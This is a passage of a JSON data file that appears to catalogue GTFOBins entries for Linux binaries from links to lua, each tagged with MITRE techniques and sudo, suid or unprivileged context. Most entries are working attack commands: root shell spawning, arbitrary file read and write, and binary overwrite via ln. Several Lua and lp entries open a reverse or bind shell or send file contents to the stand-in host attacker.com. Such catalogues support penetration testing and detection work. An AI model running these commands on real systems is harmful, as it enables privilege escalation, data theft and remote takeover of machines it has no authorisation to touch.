installation","aliases":[]},{"id":"gtfo:links:file-read:0:unprivileged","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/links/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ln:privilege-escalation:0:sudo","toolId":"gtfo:ln","toolName":"ln","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"ln -fs /bin/sh /bin/ln\nln","description":"This overrides `ln` itself with a symlink to a shell (or any other executable) that is to be executed as root, useful in case a `sudo` rule allows to only run `ln` by path. Warning, this is a destructive action.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ln/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:loginctl:shell:0:sudo","toolId":"gtfo:loginctl","toolName":"loginctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"loginctl user-status\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/loginctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:loginctl:shell:0:unprivileged","toolId":"gtfo:loginctl","toolName":"loginctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"loginctl user-status\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/loginctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-read:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-read:0:suid","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-read:0:unprivileged","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-write:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-write:0:suid","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-write:0:unprivileged","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:shell:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '/path/to/temp-file.config {\\nmail x@x.x\\n}' >/path/to/temp-file.config\necho '/bin/sh 0<&2 1>&2' >/path/to/temp-file.sh\nlogrotate -m /path/to/temp-file.sh -f /path/to/temp-file","description":"This command is picky about file permissions. An existing config file can be used as weel, provided that it contains a mail directive.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logsave:shell:0:sudo","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logsave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logsave:shell:0:suid","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logsave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logsave:shell:0:unprivileged","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logsave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:look:file-read:0:sudo","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/look/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:look:file-read:0:suid","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/look/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:look:file-read:0:unprivileged","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/look/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lp:upload:0:sudo","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lp:upload:0:suid","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lp:upload:0:unprivileged","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:file-read:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:file-read:0:suid","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:file-read:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:file-write:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ltrace -s 999 -o /path/to/input-file ltrace -F DATA","description":"The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:file-write:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ltrace -s 999 -o /path/to/input-file ltrace -F DATA","description":"The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:shell:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ltrace -b -L /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:shell:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ltrace -b -L /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:bind-shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:bind-shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:bind-shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:download:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:download:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:download:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-read:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-read:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-read:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-write:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-write:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-write:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:reverse-shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:reverse-shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:reverse-shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:upload:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:upload:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:upload:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local 